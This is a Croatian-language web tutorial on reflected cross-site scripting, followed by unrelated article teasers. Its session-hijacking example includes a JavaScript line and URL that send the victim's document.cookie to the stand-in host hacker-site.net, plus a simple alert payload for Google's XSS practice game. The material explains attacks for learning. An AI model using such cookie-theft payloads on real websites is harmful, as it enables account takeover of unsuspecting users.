Web7: XSS eksploatacije – 1. dio: Reflektirani XSS

Web7: XSS eksploatacije – 1. dio: Reflektirani XSS

Što je Cross-Site skriptiranje?

Cross-Site Scripting (XSS) jedna je od najpopularnijih tehnika napada danas, poznata kao Kum napada, a već je mnogo godina navedena kao najopasnija tehnika napada za aplikacije.

Nemojte ga skraćeno zvati CSS kako biste izbjegli zabunu s konceptom Cascading Style Sheet HTML-a.
Tehnika
XSS temelji se na umetanju opasnih skripti u izvorni kod web aplikacije. Za izvršavanje zlonamjernog Javascript koda za preuzimanje korisnikove sesije prijave.

Da bismo bolje razumjeli, razmotrimo sljedeći primjer. Web aplikacija koja omogućuje ispis vrijednosti koju prosljeđujemo putem URL-a, pod pretpostavkom da u varijablu imena prosljeđujemo Ping vrijednost:

Web7: XSS eksploatacije – 1. dio: Reflektirani XSS

Zasad je sve u redu, pregledajmo izvorni html kod:

Web7: XSS eksploatacije – 1. dio: Reflektirani XSS

Ono što je lako vidjeti je da je vrijednost imena koju smo unijeli umetnuta u izvorni kod. Tako da je moguće da se sve što je uvezeno može i ubaciti. Problem postaje ozbiljan ako unesena vrijednost nije normalan niz kao gore nego potencijalno opasan dio koda, otprilike ovako:

 

Pokušajte ponovno s gornjom vrijednošću:

Web7: XSS eksploatacije – 1. dio: Reflektirani XSS

Iz ovog primjera možemo zaključiti dvije stvari. Prvo, varijabla imena može primiti bilo koju ulaznu vrijednost i poslati je poslužitelju na obradu. Drugo, poslužitelj nije kontrolirao ovu ulaznu vrijednost prije nego što ju je vratio pregledniku. To dovodi do umetanja javascript koda u izvorni kod.

XSS se općenito dijeli na 3 glavne vrste: reflektirani, pohranjeni i temeljen na DOM-u. U ovom članku ću uglavnom spomenuti tehniku ​​Reflected XSS.

Do 75% XSS tehnika temelji se na Reflected XSS. Zove se refleksija jer u ovoj vrsti scenarija iskorištavanja haker žrtvi mora poslati URL koji sadrži zlonamjerni kod (obično javascript). Žrtva samo treba zatražiti ovaj URL i haker će odmah dobiti odgovor koji sadrži željeni rezultat (refleksivnost prikazana ovdje). Osim toga, poznat je i kao XSS prvog reda.

Scenarij rudarenja u stvarnom životu

Postoji mnogo načina za iskorištavanje Reflected XSS pogreške, jedan od najpoznatijih načina je preuzimanje korisnikove sesije, čime se pristupa podacima i stječu njihova prava na web stranici.

Pojedinosti su opisane u sljedećim koracima:

Web7: XSS eksploatacije – 1. dio: Reflektirani XSS

1. Korisnik se prijavljuje na web i pretpostavlja da mu je dodijeljena sesija:

Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4

2. Nekako, haker šalje korisniku URL:

http://example.com/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2bdocument.cookie;

Pretpostavimo da je example.com web mjesto koje posjećuje žrtva, hacker-site.net je web mjesto koje je kreirao haker

3. Žrtva pristupa gore navedenom URL-u

4. Poslužitelj odgovara žrtvi, zajedno s podacima sadržanim u zahtjevu (hakerov javascript isječak)

5. Žrtva preglednik prima odgovor i izvršava javascript

6. Stvarni javascript koji je haker napravio je sljedeći:

var i=new Image; i.src=”http://hacker-site.net/”+document.cookie;

Gornji naredbeni redak u biti šalje zahtjev hakerskoj stranici s parametrom koji je korisnički kolačić:

GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1Host: hacker-site.net

7. S vaše stranice, haker će uhvatiti gornji sadržaj zahtjeva i smatrati da je korisnikova sesija preuzeta. U ovom trenutku haker može lažno predstavljati žrtvu i ostvariti sva prava na web stranici koja žrtva ima.

Praksa

Google je napravio stranicu za vježbanje iskorištavanja XSS pogrešaka ovdje: https://xss-game.appspot.com

Cilj ovih izazova je da morate ubaciti skripte da biste otvorili skočni prozor. Prvi izazov je ilustrirati odraženu tehniku, eksploatacijski kod je prilično jednostavan:

https://xss-game.appspot.com/level1/frame?query=alert('pwned')

Sretno!


10 informacija korištenih za krađu vašeg identiteta

10 informacija korištenih za krađu vašeg identiteta

Krađa identiteta može imati nepredvidive posljedice za žrtve. Istražimo 10 vrsta informacija koje lopovi koriste za krađu identiteta kroz sljedeći članak!

Što je TeamViewer?

Što je TeamViewer?

TeamViewer je poznato ime mnogim ljudima, posebno onima koji redovito koriste računala i rade na polju tehnologije. Dakle, što je TeamViewer?

Kako prikazati instalirane upravljačke programe u sustavu Windows (PowerShell CMD)

Kako prikazati instalirane upravljačke programe u sustavu Windows (PowerShell CMD)

Ako trebate znati koji su upravljački programi instalirani u vašem sustavu, evo jednostavne PowerShell naredbe za dobivanje popisa instaliranih upravljačkih programa u sustavu Windows.

Zelene pozadine, prekrasne zelene pozadine za računala i telefone

Zelene pozadine, prekrasne zelene pozadine za računala i telefone

Zeleno je također tema koju mnogi fotografi i dizajneri koriste za izradu setova tapeta s glavnim tonom zelene boje. Ispod je set zelenih pozadina za računala i telefone.

Kako pronaći i otvoriti datoteke pomoću naredbenog retka

Kako pronaći i otvoriti datoteke pomoću naredbenog retka

Kaže se da je ova metoda pretraživanja i otvaranja datoteka brža od korištenja File Explorera.

Što je Scareware? Kako ukloniti Scareware?

Što je Scareware? Kako ukloniti Scareware?

Scareware je zlonamjerni računalni program osmišljen kako bi prevario korisnike da misle da je to legitimna aplikacija i traži od vas da potrošite novac na nešto što ne radi ništa.

Kako povećati brzinu internetske veze s cFosSpeedom

Kako povećati brzinu internetske veze s cFosSpeedom

cFosSpeed ​​​​je softver koji povećava brzinu internetske veze, smanjuje latenciju prijenosa i povećava snagu veze do otprilike 3 puta. Osobito za one koji igraju online igre, cFosSpeed ​​​​će podržati kako biste mogli iskusiti igru ​​bez ikakvih problema s mrežom.

Saznajte više o vatrozidima, Vatrozid za Windows na Windows Serveru 2012

Saznajte više o vatrozidima, Vatrozid za Windows na Windows Serveru 2012

Vatrozid za Windows s naprednom sigurnošću je vatrozid koji radi na Windows Serveru 2012 i omogućen je prema zadanim postavkama. Postavkama vatrozida u sustavu Windows Server 2012 upravlja se u Windows Firewall Microsoft Management Console.

Kako promijeniti lozinku za prijavu na modem i ruter Vigor Draytek

Kako promijeniti lozinku za prijavu na modem i ruter Vigor Draytek

Prilikom promjene lozinke administratorske stranice za prijavu modema i usmjerivača Vigor Draytek, korisnici će ograničiti neovlašteni pristup za promjenu lozinke modema, osiguravajući važne informacije o mreži.

Kako jednostavno overclockati RAM uz AMD Ryzen Master

Kako jednostavno overclockati RAM uz AMD Ryzen Master

Srećom, korisnici Windows računala s AMD Ryzen procesorima mogu koristiti Ryzen Master za jednostavno overclockiranje RAM-a bez diranja BIOS-a.